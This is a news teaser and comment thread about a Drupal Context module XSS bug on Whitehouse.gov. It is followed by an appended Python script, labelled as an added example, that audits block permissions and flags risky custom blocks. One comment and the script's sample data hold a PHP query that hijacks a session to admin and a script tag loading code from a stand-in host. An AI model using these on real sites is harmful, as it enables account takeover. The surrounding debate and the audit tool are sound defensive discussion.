White House devs overlooked gaping Drupal vuln

A researcher has uncovered a potentially serious vulnerability in the open-source content management system used by the White House website and thousands of other sites. The XSS, or cross-site scripting, bug resides in the Drupal Context module, a plug-in that Whitehouse.gov and about 10,000 other sites use to manage how …

COMMENTS

This topic is closed for new posts.
  1. My Alter Ego

    The OSS criticism has a point

    We have FreeBSD installed on several machines. If I come across issues I obviously check for existing fixes; if there are none (quite often), then I do my best to understand the problem and patch it. In an effort to "share the love", I always submit a patch to the project's maintainer, but more often than not I don't even get a response. Funnily enough, MySQL have the best record (at least with me).

    I've now got a documented list of patches I need to apply to a range of packages when upgrading, which is getting rather tedious.

    That said, at least it's all open source, so that I can patch issues rather than waiting for the vendor to do it for me.

    Evil Steve? It's the closest icon to Beastie.

  2. andb

    Poor journalism

    With a clear understanding of how modern websites work, it's very obvious that this is not an issue at all. Sites like Whitehouse.gov use a CMS to generate content, then actually serve static content from simple, hardened web servers. The public can't actually log in to anything running Drupal on a site like this. So there is frankly no way to exploit the "vulnerability". The Whitehouse IT department most likely understood the vulnerability, realized that it couldn't be exploited in their case and made the informed choice to use a release candidate module.

    To actually exploit this, someone would have to be on a Whitehouse internal network. They would also have to have an account with administrative privileges. If a user has this, there are probably already a lot of other things they can do to the site...

    Looking at Mr. Keane's "advisories" about Drupal security, most are things that an administrator can do to wreck his own site. It makes me wonder if he really can only attract attention to himself by spreading F.U.D.

    I'm disappointed with the Register for such poor journalism with clearly inadequate fact finding performed.

  3. Michael Cooper

    I wouldn't call it a huge vuln, nor easy to find

    I think that the article is a bit misleading in how it describes the bug as being easy to find and exploit.

    First off, it requires permissions to create blocks. This is typically a pretty high end permission. 9 times out of 10 I delegate this permission to *no one*. Even if one does allow other users to have this permission, they are typically content editors with control over overall site layout and structure. These users probably have all the access they'd need to do something malicious if they wanted to by virtue of their assumed position--or the ability to sit at your computer while you grab coffee or the boss calls you away.

    I'd agree with Knaddison that this is a pretty hard bug to exploit and that to exploit it, you would need someone who did not properly consider permissions access on their site to begin with--even so, it is certainly something that a user who didn't already have admin permissions could exploit.

  4. decibel.places

    ho hum

    XSS vulnerabilities are commonly and frequently found in contributed module code. They are usually plugged with a module update without any exploits.

    The Webform Report module was pulled from release for a very minor vulnerability, and has been fixed and reactivated. I kept 4 sites using the "vulnerable" version with no mishaps until the patched version became available.

    Compared to the Twitter followers bug, this is a minor problem and will be corrected through routine maintenance and code upgrades.

  5. drjango

    Misleading Article - Bad Journalism

    If you actually read the Advisory linked from this article (rather than author's very frivolous interpretation) you will see that it clearly states:

    "In order to execute arbitrary script injection malicious users must have 'Administer blocks' permission."

    Now, it's important to understand what this means. "Administer blocks" privilege is only ever given to the users with the highest administrative rights. No "guest" user or even simply registered user would ever have that, so as far as they are concerned - they can't do anything. Also, if you do have administrative rights of that level in any CMS, you can do way more damage than inject some javascript. There's no reason whatsoever to conclude that whitehouse.gov has a vulnerability, based on this advisory, yet the article not only suggests it, but also asserts the existence of one.

    This is bad journalism.

  6. nowarninglabel

    What a horrible article

    First of all, this is already fixed just hours later: http://drupal.org/node/795118

    Second of all, the chance of exploit is near 0% because it requires a privilege that is not normally assigned to non-administrative users. The idea that it was a vulnerability that could actually be exploited on whitehouse.gov is laughable at best, but is really just sensationalism at its worst.

    Third, the quote from Greg is obviously taken out of context. This problem was fixed right away, very easy to see the value of open source software there.

    Lastly, if the security researcher had followed the established guidelines of contacting the module maintainer before publicly exposing the vulnerability then there would have been no story here at all.

  7. Anonymous Coward

    This is just silly

    This is a whole lot of hype over nothing. Do you know how many people have the 'Administer blocks' permission required to exploit this XSS vulnerability? Probably about 4 people, all on the site's team. Guess what? If you give someone the keys to your car, they can change the tilt on your rear-view mirror, too! Someone was looking for an excuse to run a big headline. And oh, what's this? There's a new corrected version out already? Gotta love open source.

  8. the bat

    Trying to drum up a contract with the white house

    Trying to drum up a contract with the White House - why target the White House? Why not CNN or someone else? That has to be someone crying over a job they lost because the White House didn't purchase the services!

  9. Jimmy Pop

    Terrible...

    Still.. I got a giggle.

    I love Drupal, and, as someone who has used/administered it, I have to agree with the other commentators who have derided the story originator's ability to think/read/etc.. and El Reg for blindly repeating it.

    But looking back a couple of years ago, before I'd heard of Drupal, I might have been suckered by a story like this.. its almost understandable...

    If you don't know what "Administer Blocks Permission" means.. (if your role has it, it lets you create chunks of page for the users (a block).. and you can put anything in those blocks and choose where they appear, in which theme, for whom etc, it lets you run php,javascript,html.. and runs in the context of the page, not the node, so has full rights to accounts/databases.. very powerful/flexible.. and obviously not for general or everyday use, and not only limited to XSS.. you could do anything)

    Perhaps reading the informative nodes on the drupal site would help in future.. some users are a tad fanatical! (and El Reg actually resembles a Zen Themed Drupal install.. lol, except for the Tranny DTD)

  10. Kevin Bailey

    Open source works again...

    As others have mentioned - create blocks privilege is not normally given to anyone apart from system admins. The Reg should have checked with a Drupal dev before running the article as it makes El Reg look a bit sloppy on this one.

    The fact that this vuln is discussed and patches are available and the whole issue is in the open shows that OSS works as it should. No software is absolutely perfect - but at least OSS can get fixed quickly.

  11. Robert Carnegie

    An exploitable vulnerabilty! I am shocked! Shocked!

    Why, those noodles at the White House must be as incompetent as Microsoft, Apple, or those lunkheads who made Linux! All of whom have released software with exploitable vulnerabilities!

    Impeachment's not out of the question, you know.

  12. bell

    There is so much irresponsible going on here ...

    ... that it's just beyond funny. Starting with filing a full CVE vulnerability for a problem with release candidate software. File a bug against the module, contribute a patch if you're feeling constructive, there's no evidence of this problem being known and ignored for any period of time. The Drupal security team are perfectly within their rights to claim that it's only their problem if it's a release version. If that deprives the poor widdle researcher of his moment in the security advisory limelight, tough! No need to go proving the guy from Verizon right about narcissistic vulnerability pimps.

    El-Reg has also really failed to apply the critical analysis that we have come to expect. You were on the way there with your (simplified to the point of dubious accuracy) description of blocks. Just one or two more questions - following down the road of who gets the privilege by default and under what circumstances that group would grow - would have painted the whole story in a different light. Be a bit more careful about what you're biting ... please?

  13. Anonymous Coward

    no security audit... hmmm why not?

    Because from the sound of it the response would have been, "no don't put it on the interwebs, that's unsecure you know (justify my fee somehow - I have a CCNA)".

    I like security people, but plenty dig at me for being an OSS developer.

  14. Reg Sim

    Misleading Article - Bad Journalism

    "Because the vulnerability resides in a release-candidate module," - so it's not a Drupal bug per se.

    And as the others have gone a bit more technical about how it does not affect the White House, I can only presume this article is designed to bash open-source tools and products?

  15. Anonymous Coward

    TheRegister overlooks gaping Credibility hole

    Is there an editor in the house?

    Would ElReg care to update the article, or respond to the comments, or remove the misleading "Gaping" from the title of the article?

    No? You'd rather just put misinformation in the featured articles bar on the homepage?

  16. Dan Goodin (Written by Reg staff)

    @Anonymous Coward

    For the record, "gaping" was used to suggest how easy it was for this bug to be spotted during a routine audit. A bug need not be easily exploitable for it to be extremely obvious.

    Given the ability for Drupal XSS's to silently reset the super user password, I think it's fair to say this bug should have been caught long ago. It wasn't, even after the White House developers gave themselves a big pat on the back for releasing their own code that built off the same buggy module.

    That's why the vuln is news and why The Reg stands by this story.

    Carry on.

  17. nicklewisatx

    Please...

    @Dan Goodin - tell me this, would anyone have been able to hack the whitehouse.gov with this information?

    Unless the whitehouse is full of loonies, the answer is clearly no.

    If anyone is hacked in this manner they are an idiot - plain and simple. Mere access to administering blocks could be exploited for both fun, and evil. If the register were a drupal site, your entire right sidebar is full of blocks. I could have a lot of fun: especially as a satirist who would want to make fun of your advertisers and sensationalist journalism.

    Consider this: In drupal core there is a module called "phpfilter" which is turned off by default and recommended against. If you had the php_filter module on... well, then I could do this too if I had permission to administer blocks:

    <?php
    // Drupal 6 style: table name in braces so the prefix is applied, and the
    // address passed through a placeholder instead of interpolated into the SQL.
    $my_ip = ip_address();
    db_query("UPDATE {sessions} SET uid = 1 WHERE hostname = '%s'", $my_ip);
    ?>

    OMG THAT GIVES YOU ADMIN ACCESS! THE WHITE HOUSE HAS THAT MODULE DISABLED BUT WHAT DOES THAT SAY ABOUT THEIR SECURITY REVIEW?! lol Everyone call the newspapers! We have a serious story on our hands....

    You stand by the register, I stand by the Drupal Security team. They are top rate, while you sir are probably a nice guy, and could use better information to inform the angle you took on this story.
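The two checks the commenters keep coming back to (comments 3, 5 and 9: who actually holds 'Administer blocks'; comments 9, 16 and 17: what someone with that permission could have left behind in a custom block, including a body stored under the PHP filter's input format) are easy to script against a site's database. The following is an added example, not code from the article, from Drupal core or from the Context module. It builds a small slice of the Drupal 6 schema in an in-memory SQLite database with constructed sample rows; the table and column names (role, permission.perm as a comma-separated string, users_roles, boxes, filter_formats, filters) follow Drupal 6 core as I remember them, and modelling the PHP filter as a filters row with module = 'php' is an assumption stated in the code. Against a real site you would point the same queries at the live database instead of load_sample_db().

```python
"""
Added audit example, not from the article or the Drupal/Context projects.

Answers two questions from the discussion against a Drupal 6 style database:
  1. which roles, and therefore which users, hold a given permission
     (Drupal 6 keeps each role's permissions as one comma-separated string
     in permission.perm, so splitting beats a LIKE '%...%' pattern);
  2. which custom blocks (boxes table) carry content that runs in visitors'
     browsers (raw script/handlers in the body) or on the server (a body
     stored under an input format that has the PHP filter attached).

Assumptions: Drupal 6 core table and column names; the PHP filter is
modelled as a row in the filters table with module = 'php'.
"""
import re
import sqlite3

SCHEMA = """
CREATE TABLE role (rid INTEGER PRIMARY KEY, name TEXT);
CREATE TABLE permission (pid INTEGER PRIMARY KEY, rid INTEGER, perm TEXT);
CREATE TABLE users (uid INTEGER PRIMARY KEY, name TEXT, status INTEGER);
CREATE TABLE users_roles (uid INTEGER, rid INTEGER);
CREATE TABLE boxes (bid INTEGER PRIMARY KEY, body TEXT, info TEXT, format INTEGER);
CREATE TABLE filter_formats (format INTEGER PRIMARY KEY, name TEXT);
CREATE TABLE filters (fid INTEGER PRIMARY KEY, format INTEGER, module TEXT, delta INTEGER);
"""

# Constructed sample data, not taken from any real site.
SAMPLE_ROWS = {
    "role": [(1, "anonymous user"), (2, "authenticated user"),
             (3, "editor"), (4, "site admin")],
    "permission": [
        (1, 1, "access content"),
        (2, 2, "access content, access comments, post comments"),
        # the editor role was handed block administration "for convenience"
        (3, 3, "access content, create story content, edit any story content, administer blocks"),
        (4, 4, "administer blocks, administer site configuration, administer users"),
    ],
    "users": [(1, "admin", 1), (2, "alice", 1), (3, "bob", 1), (4, "mallory", 1)],
    "users_roles": [(1, 4), (2, 3), (4, 3), (3, 2)],
    "filter_formats": [(1, "Filtered HTML"), (2, "Full HTML"), (3, "PHP code")],
    "filters": [(1, 1, "filter", 0), (2, 2, "filter", 1), (3, 3, "php", 0)],
    "boxes": [
        (1, "<p>Welcome to the site.</p>", "Welcome text", 1),
        (2, "<p>Sponsors</p><script src='http://example.invalid/x.js'></script>", "Sidebar promo", 2),
        (3, "<?php db_query(\"UPDATE {sessions} SET uid = 1 WHERE hostname = '%s'\", ip_address()); ?>", "Footer", 3),
    ],
}

# Markup that executes in the browser when a body is printed without escaping.
ACTIVE_CONTENT = re.compile(r"<script\b|javascript:|\bon[a-z]+\s*=", re.IGNORECASE)


def load_sample_db():
    """In-memory database populated with the constructed rows above."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    for table, rows in SAMPLE_ROWS.items():
        marks = ",".join("?" * len(rows[0]))
        conn.executemany(f"INSERT INTO {table} VALUES ({marks})", rows)
    return conn


def roles_with_permission(conn, perm):
    """(rid, name) of every role whose perm list contains exactly `perm`."""
    found = []
    for rid, name, perms in conn.execute(
            "SELECT r.rid, r.name, p.perm FROM role r "
            "JOIN permission p ON p.rid = r.rid ORDER BY r.rid"):
        granted = {item.strip() for item in perms.split(",")}
        if perm in granted:
            found.append((rid, name))
    return found


def users_with_permission(conn, perm):
    """Users holding `perm` through any role, plus uid 1, which Drupal
    treats as having every permission regardless of its roles."""
    rids = [rid for rid, _ in roles_with_permission(conn, perm)]
    names = {row[0] for row in conn.execute("SELECT name FROM users WHERE uid = 1")}
    if rids:
        marks = ",".join("?" * len(rids))
        names.update(row[0] for row in conn.execute(
            "SELECT DISTINCT u.name FROM users u JOIN users_roles ur ON ur.uid = u.uid "
            f"WHERE ur.rid IN ({marks})", rids))
    return sorted(names)


def suspicious_boxes(conn):
    """(bid, info, reasons) for custom blocks that would execute something:
    active markup in the body, or a body stored under a PHP filter format."""
    php_formats = {row[0] for row in conn.execute(
        "SELECT format FROM filters WHERE module = 'php'")}
    flagged = []
    for bid, body, info, fmt in conn.execute(
            "SELECT bid, body, info, format FROM boxes ORDER BY bid"):
        reasons = []
        if ACTIVE_CONTENT.search(body):
            reasons.append("active content in body")
        if fmt in php_formats:
            reasons.append("php filter format")
        if reasons:
            flagged.append((bid, info, reasons))
    return flagged


if __name__ == "__main__":
    db = load_sample_db()
    print("roles with 'administer blocks':", roles_with_permission(db, "administer blocks"))
    print("users with 'administer blocks':", users_with_permission(db, "administer blocks"))
    for bid, info, reasons in suspicious_boxes(db):
        print(f"box {bid} ({info!r}): {', '.join(reasons)}")
```

On the sample data the editor role turns out to carry 'administer blocks', so alice and mallory join admin in the list of people who could plant a block, and two of the three custom blocks get flagged: one with a remote script tag under Full HTML, and one whose body sits under the PHP code format (the session-hijack query from the comment above). Splitting permission.perm on commas rather than matching with LIKE avoids false hits on permission names that merely contain the string, and uid 1 is included unconditionally because Drupal never consults roles for it.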
